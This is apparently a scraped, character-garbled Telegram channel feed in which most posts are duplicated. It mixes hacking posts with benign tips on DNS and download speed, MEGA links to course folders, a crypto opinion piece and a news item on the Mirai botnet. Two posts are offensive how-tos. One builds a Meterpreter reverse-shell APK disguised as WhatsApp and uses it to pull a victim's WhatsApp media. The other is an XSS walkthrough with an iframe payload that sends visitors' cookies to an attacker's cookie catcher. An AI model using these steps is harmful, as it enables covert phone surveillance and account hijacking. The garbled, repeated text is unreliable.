Androguard usage.pdf
161.6 KB
How to use Androguard- hack
full tutorial for beginers #requested
full tutorial for beginers #requested
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack WhatsApp using Meterpreter in parrot linux or Kali Linux.
open terminal and type :
1οΈβ£Let's create a payload virus :
1) msfvenom -p android/meterpreter/reversetcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk
2) msfconsole
3) use exploit/multi/handler
4) set payload android/meterpreter/reversetcp
5) set lhost (YOUR IP)
6) exploit
7) cd /
8) ls -l
now you have been connected to the phone, now you have to take the data of his WhatsApp from his phone, for which first you have to go to the root files of his phone, whose command is given :
9) cd sdcard
10) ls -l
2οΈβ£ After coming to the SD card, you will see the interface of some such applications where all the applications installed in his phone will be visible to everyone.
1) cd WhatsApp
2) ls -l
3) cd Media
4) ls -l
After coming inside WhatsApp, you will have some such files open in front of you, where you have to
go to the media folder.
5) cd WhatsApp \ Images
6) ls -l
(Like I will go to the image folder and download an image and show you the commands you will find)
> example download (YOUR FILE NAME)
7) file has been downloaded, this file will
come in the root folder in your Linux.
ENJOY β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack WhatsApp using Meterpreter in parrot linux or Kali Linux.
open terminal and type :
1οΈβ£Let's create a payload virus :
1) msfvenom -p android/meterpreter/reversetcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk
2) msfconsole
3) use exploit/multi/handler
4) set payload android/meterpreter/reversetcp
5) set lhost (YOUR IP)
6) exploit
7) cd /
8) ls -l
now you have been connected to the phone, now you have to take the data of his WhatsApp from his phone, for which first you have to go to the root files of his phone, whose command is given :
9) cd sdcard
10) ls -l
2οΈβ£ After coming to the SD card, you will see the interface of some such applications where all the applications installed in his phone will be visible to everyone.
1) cd WhatsApp
2) ls -l
3) cd Media
4) ls -l
After coming inside WhatsApp, you will have some such files open in front of you, where you have to
go to the media folder.
5) cd WhatsApp \ Images
6) ls -l
(Like I will go to the image folder and download an image and show you the commands you will find)
> example download (YOUR FILE NAME)
7) file has been downloaded, this file will
come in the root folder in your Linux.
ENJOY β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
π¦TOTAL COURSES @Undercode_Testing 350TB
π¦2020 new The System Administrator's Guide to Bash Scripting
1) Introduction
https://mega.nz/folder/jJEiwSSI#9vZNRvQTDK9oAhrTxminWw
2) Core Concepts
> https://mega.nz/folder/TdcSBS4b#2AYRtzIqw_eqRDFBDS2Kvw
3) Conditional Statements
> https://mega.nz/folder/zJMEGYZJ#NDwa2yZPx76vJ7LKdKdx1g
4) Input and Output
https://mega.nz/folder/HZNU0IJT#VTy94hM1k1uiaKWBMeGV4A
5) Debugging and Error Handling
https://mega.nz/folder/fMNiWQqa#G9L7-tlrqOTI2a8R5sYCjg
6) Functions
https://mega.nz/folder/OdEkjS7R#rUKagm1RYEZUlgpb-1qzqw
7) SamplesUse Cases
https://mega.nz/folder/qZcwkYrK#CoojJJpSa_Q_rwV5GvvO9g
8) Conclusion
https://mega.nz/folder/KVEWxCAL#zbBog9VAfo0HW1xInWALGg
9) Linux by Example for Novices to Pros
https://mega.nz/folder/mRcUECQB#KTmLttOnI6I9RIBdQFAdvA
ENJOY β€οΈππ»
π¦2020 new The System Administrator's Guide to Bash Scripting
1) Introduction
https://mega.nz/folder/jJEiwSSI#9vZNRvQTDK9oAhrTxminWw
2) Core Concepts
> https://mega.nz/folder/TdcSBS4b#2AYRtzIqw_eqRDFBDS2Kvw
3) Conditional Statements
> https://mega.nz/folder/zJMEGYZJ#NDwa2yZPx76vJ7LKdKdx1g
4) Input and Output
https://mega.nz/folder/HZNU0IJT#VTy94hM1k1uiaKWBMeGV4A
5) Debugging and Error Handling
https://mega.nz/folder/fMNiWQqa#G9L7-tlrqOTI2a8R5sYCjg
6) Functions
https://mega.nz/folder/OdEkjS7R#rUKagm1RYEZUlgpb-1qzqw
7) SamplesUse Cases
https://mega.nz/folder/qZcwkYrK#CoojJJpSa_Q_rwV5GvvO9g
8) Conclusion
https://mega.nz/folder/KVEWxCAL#zbBog9VAfo0HW1xInWALGg
9) Linux by Example for Novices to Pros
https://mega.nz/folder/mRcUECQB#KTmLttOnI6I9RIBdQFAdvA
ENJOY β€οΈππ»
mega.nz
60.92 MB folder on MEGA
3 files
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ProxyBroker is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.
π¦FEATURES :
-Finds more than 7000 working proxies from ~50 sources.
-Support protocols: HTTP(S), SOCKS4/5. Also CONNECT method to ports 80 and 23 (SMTP).
-Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.
-Work as a proxy server that distributes incoming requests to external proxies. With automatic proxy rotation.
-All proxies are checked to support Cookies and Referer (and POST requests if required).
Automatically removes duplicate proxies.
-Is asynchronous.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) To install last stable release from pypi:
$ pip install proxybroker
2) MANUAL INSTALL :
$ pip install -U git+https://github.com/constverum/ProxyBroker.git
3) Find and save to a file 10 US proxies (without a check):
$ proxybroker grab --countries US --limit 10 --outfile ./proxies.txt
4) Serve
Run a local proxy server that distributes incoming requests to a pool of found HTTP(S) proxies with the high level of anonymity:
$ proxybroker serve --host 127.0.0.1 --port 8888 --types HTTP HTTPS --lvl High
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ProxyBroker is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.
π¦FEATURES :
-Finds more than 7000 working proxies from ~50 sources.
-Support protocols: HTTP(S), SOCKS4/5. Also CONNECT method to ports 80 and 23 (SMTP).
-Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.
-Work as a proxy server that distributes incoming requests to external proxies. With automatic proxy rotation.
-All proxies are checked to support Cookies and Referer (and POST requests if required).
Automatically removes duplicate proxies.
-Is asynchronous.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) To install last stable release from pypi:
$ pip install proxybroker
2) MANUAL INSTALL :
$ pip install -U git+https://github.com/constverum/ProxyBroker.git
3) Find and save to a file 10 US proxies (without a check):
$ proxybroker grab --countries US --limit 10 --outfile ./proxies.txt
4) Serve
Run a local proxy server that distributes incoming requests to a pool of found HTTP(S) proxies with the high level of anonymity:
$ proxybroker serve --host 127.0.0.1 --port 8888 --types HTTP HTTPS --lvl High
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WEBSITE HACKING METHODE
π¦WEBSITE HACKING METHODE
1) Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is not vulnerable to a cross-site scripting attack, then this will not work.
2)
Go to create a post. You will need to type some special code into the "post" which will capture the data of all who click on it.
You'll want to test to see if the system filters out code. Post
<script>window.alert("test")</script>
If an alert box appears when you click on your post, then the site is vulnerable to attack.
3)
Create and upload your cookie catcher. The goal of this attack is to capture a user's cookies, which allows you access to their account for websites with vulnerable logins. You'll need a cookie catcher, which will capture your target's cookies and reroute them. Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload. An example cookie catcher code can be found in the sample section.
2)
Go to create a post. You will need to type some special code into the "post" which will capture the data of all who click on it.
You'll want to test to see if the system filters out code. Post
<script>window.alert("test")</script>
If an alert box appears when you click on your post, then the site is vulnerable to attack.
3)
Create and upload your cookie catcher. The goal of this attack is to capture a user's cookies, which allows you access to their account for websites with vulnerable logins. You'll need a cookie catcher, which will capture your target's cookies and reroute them. Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload. An example cookie catcher code can be found in the sample section.
4) Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
An example code would look like
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
An example code would look like
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.
@UndercodeTesting
(source wiki)
enjoy
β β β Uππ»βΊπ«Δπ¬πβ β β β
@UndercodeTesting
(source wiki)
enjoy
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
mega.nz
943.5 MB folder on MEGA
33 files
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SPEED UP DOWNLOAD SPEED
use the correct channel type for your router
Test a different modem/router. The biggest cause of slowed down
internet is a bad modem.
Scan for viruses.
Check for on-system interference.
Check your filters.
Try getting rid of your cordless phone
Plug in.
Check for external interference.
Check for Foxtel or other types of TV.
use interent download manager
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SPEED UP DOWNLOAD SPEED
use the correct channel type for your router
Test a different modem/router. The biggest cause of slowed down
internet is a bad modem.
Scan for viruses.
Check for on-system interference.
Check your filters.
Try getting rid of your cordless phone
Plug in.
Check for external interference.
Check for Foxtel or other types of TV.
use interent download manager
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Optimize your devices' DNS :-Speedup net speed :
I'm using Cloudflare as an example, but these techniques will work with any DNS provider.
1οΈβ£ROUTER
If you're using a router for your office network DNS settingsβand you probably areβlog into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:
1) For IPv4: 1.1.1.1 and 1.0.0.1
2) For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.
π °οΈWINDOWS
With Windows 10:
1) Click on the Start menu.
2) Click on the Settings icon.
3) Click on Network & Internet.
4) Click on Change adapter options.
5) Double-click on the active network adapter.
6) Write down any existing DNS server entries for future reference.
7) Click Use The Following DNS Server Addresses.
8) Replace those addresses with the 1.1.1.1 DNS addresses:
> For IPv4: 1.1.1.1 and 1.0.0.1
> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
π ±οΈWith Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:
1) Click on Network and Internet.
2) Click on Change Adapter Settings.
3) Right click on the Wi-Fi network you are connected to, then click Properties.
4) Select Internet Protocol Version 4 (or Version 6 if desired).
5) Click Properties.
6) Write down any existing DNS server entries for future reference.
7) Click Use The Following DNS Server Addresses.
8) Replace those addresses with the 1.1.1.1 DNS addresses:
> For IPv4: 1.1.1.1 and 1.0.0.1
> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
WELL DONE
E N J O Y β€οΈππ»
wiki source
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Optimize your devices' DNS :-Speedup net speed :
I'm using Cloudflare as an example, but these techniques will work with any DNS provider.
1οΈβ£ROUTER
If you're using a router for your office network DNS settingsβand you probably areβlog into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:
1) For IPv4: 1.1.1.1 and 1.0.0.1
2) For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.
π °οΈWINDOWS
With Windows 10:
1) Click on the Start menu.
2) Click on the Settings icon.
3) Click on Network & Internet.
4) Click on Change adapter options.
5) Double-click on the active network adapter.
6) Write down any existing DNS server entries for future reference.
7) Click Use The Following DNS Server Addresses.
8) Replace those addresses with the 1.1.1.1 DNS addresses:
> For IPv4: 1.1.1.1 and 1.0.0.1
> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
π ±οΈWith Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:
1) Click on Network and Internet.
2) Click on Change Adapter Settings.
3) Right click on the Wi-Fi network you are connected to, then click Properties.
4) Select Internet Protocol Version 4 (or Version 6 if desired).
5) Click Properties.
6) Write down any existing DNS server entries for future reference.
7) Click Use The Following DNS Server Addresses.
8) Replace those addresses with the 1.1.1.1 DNS addresses:
> For IPv4: 1.1.1.1 and 1.0.0.1
> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
WELL DONE
E N J O Y β€οΈππ»
wiki source
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦As a smart contract platform, what are the advantages of BSV?
> Almost all DeFi projects are now on Ethereum. Will the future smart contract platform always be Ethereum?
> Objectively speaking, I think there is a 70% chance that it will still be Ethereum. The premise is that the development of Ethereum 2.0 is smooth. The existing moat of Ethereum is very high, but there are many shortcomings, so it is urgent to upgrade to 2.0 to change everything.
> I think the remaining probability can be given to BSV and DOT.
Needless to say, DOT is actually a faster-moving Ethereum 2.0, the ultimate sharding system, but compared to Ethereum, there are not so many developers and consensus, and it is difficult to replace it.
> If there is a small probability event, BSV is very likely. I am still very optimistic about the BSV smart contract platform.
> The advantage of BSV is that the contract only has operation instructions and results on the chain, and the process is calculated by itself, while Ethereum is the entire chain.
> BSV takes the route of on-demand verification. If you think the result of this contract is related to your interests, you can count it. You only need to compare the results to find out. Those who need it will follow the calculation. There is no need for the whole network to be brainless. Calculate together, this is more efficient.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦As a smart contract platform, what are the advantages of BSV?
> Almost all DeFi projects are now on Ethereum. Will the future smart contract platform always be Ethereum?
> Objectively speaking, I think there is a 70% chance that it will still be Ethereum. The premise is that the development of Ethereum 2.0 is smooth. The existing moat of Ethereum is very high, but there are many shortcomings, so it is urgent to upgrade to 2.0 to change everything.
> I think the remaining probability can be given to BSV and DOT.
Needless to say, DOT is actually a faster-moving Ethereum 2.0, the ultimate sharding system, but compared to Ethereum, there are not so many developers and consensus, and it is difficult to replace it.
> If there is a small probability event, BSV is very likely. I am still very optimistic about the BSV smart contract platform.
> The advantage of BSV is that the contract only has operation instructions and results on the chain, and the process is calculated by itself, while Ethereum is the entire chain.
> BSV takes the route of on-demand verification. If you think the result of this contract is related to your interests, you can count it. You only need to compare the results to find out. Those who need it will follow the calculation. There is no need for the whole network to be brainless. Calculate together, this is more efficient.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Mirai botnet exploits CVE-2020-5902 vulnerability to attack IoT devices
#News
> After the first disclosure of two F5 BIG-IP vulnerabilities in the first week of July , we continued to monitor and analyze these vulnerabilities and other related activities to further understand their severity. According to the workaround released for CVE-2020-5902 , we found an Internet of Things (IoT) Mirai botnet downloader (detected by Trend Micro as Trojan.SH.MIRAI.BOI ), which can be added to new malware Scan in the variant to expose the Big-IP box.
> The samples discovered this time also attempt to exploit the newly disclosed unpatched vulnerabilities. It is recommended that system administrators and individuals using related equipment immediately patch their respective tools.
π¦conventional
As previously reported , this security vulnerability involves a remote code execution (RCE) vulnerability in the BIG-IP management interface, namely the Traffic Management User Interface (TMUI). After analyzing the published information , we noticed from the Apache httpd mitigation rules that one way to exploit this vulnerability is to include an HTTP GET request containing a semicolon character in the URI. In the Linux command line, the semicolon sends a signal to the interpreter that the command line has been completed, which is a character that the vulnerability needs to trigger.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Mirai botnet exploits CVE-2020-5902 vulnerability to attack IoT devices
#News
> After the first disclosure of two F5 BIG-IP vulnerabilities in the first week of July , we continued to monitor and analyze these vulnerabilities and other related activities to further understand their severity. According to the workaround released for CVE-2020-5902 , we found an Internet of Things (IoT) Mirai botnet downloader (detected by Trend Micro as Trojan.SH.MIRAI.BOI ), which can be added to new malware Scan in the variant to expose the Big-IP box.
> The samples discovered this time also attempt to exploit the newly disclosed unpatched vulnerabilities. It is recommended that system administrators and individuals using related equipment immediately patch their respective tools.
π¦conventional
As previously reported , this security vulnerability involves a remote code execution (RCE) vulnerability in the BIG-IP management interface, namely the Traffic Management User Interface (TMUI). After analyzing the published information , we noticed from the Apache httpd mitigation rules that one way to exploit this vulnerability is to include an HTTP GET request containing a semicolon character in the URI. In the Linux command line, the semicolon sends a signal to the interpreter that the command line has been completed, which is a character that the vulnerability needs to trigger.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ANDROID DEVELOPMENT 2020 :
1) Introduction and Syllabus
> https://mega.nz/folder/zQkjAYaD#3uhvM5L5SmYB_2mjWx-Ggg
2) Installing and Configuring the Environment
> https://mega.nz/folder/SI9nAIqQ#g46L3b6oL8C5yZuPfVYpHg
3) Exploring the SDK and Emulator
> https://mega.nz/folder/vcsFkIwJ#OBYbEywu_YhUi0euke8lIQ
4) Creating Our First App and Adding Basic Controls
> https://mega.nz/folder/qQ9TUCpK#C0odzq4EAU0WgU_L_gUvOQ
5) The Layout Manager and Form Controls
> https://mega.nz/folder/iclDnYQY#-QEIMxsCWTFML6Yyeqs35Q
6) Event and Error Handling
> https://mega.nz/folder/PJ9DyQiR#x_fKDT6zCh2krQ27aexjJw
7) Advanced and Custom UI Controls
> https://mega.nz/folder/XUt3wCbb#5pPWAsbpt3MnOcCUDG9_FQ
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ANDROID DEVELOPMENT 2020 :
1) Introduction and Syllabus
> https://mega.nz/folder/zQkjAYaD#3uhvM5L5SmYB_2mjWx-Ggg
2) Installing and Configuring the Environment
> https://mega.nz/folder/SI9nAIqQ#g46L3b6oL8C5yZuPfVYpHg
3) Exploring the SDK and Emulator
> https://mega.nz/folder/vcsFkIwJ#OBYbEywu_YhUi0euke8lIQ
4) Creating Our First App and Adding Basic Controls
> https://mega.nz/folder/qQ9TUCpK#C0odzq4EAU0WgU_L_gUvOQ
5) The Layout Manager and Form Controls
> https://mega.nz/folder/iclDnYQY#-QEIMxsCWTFML6Yyeqs35Q
6) Event and Error Handling
> https://mega.nz/folder/PJ9DyQiR#x_fKDT6zCh2krQ27aexjJw
7) Advanced and Custom UI Controls
> https://mega.nz/folder/XUt3wCbb#5pPWAsbpt3MnOcCUDG9_FQ
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
mega.nz
File folder on MEGA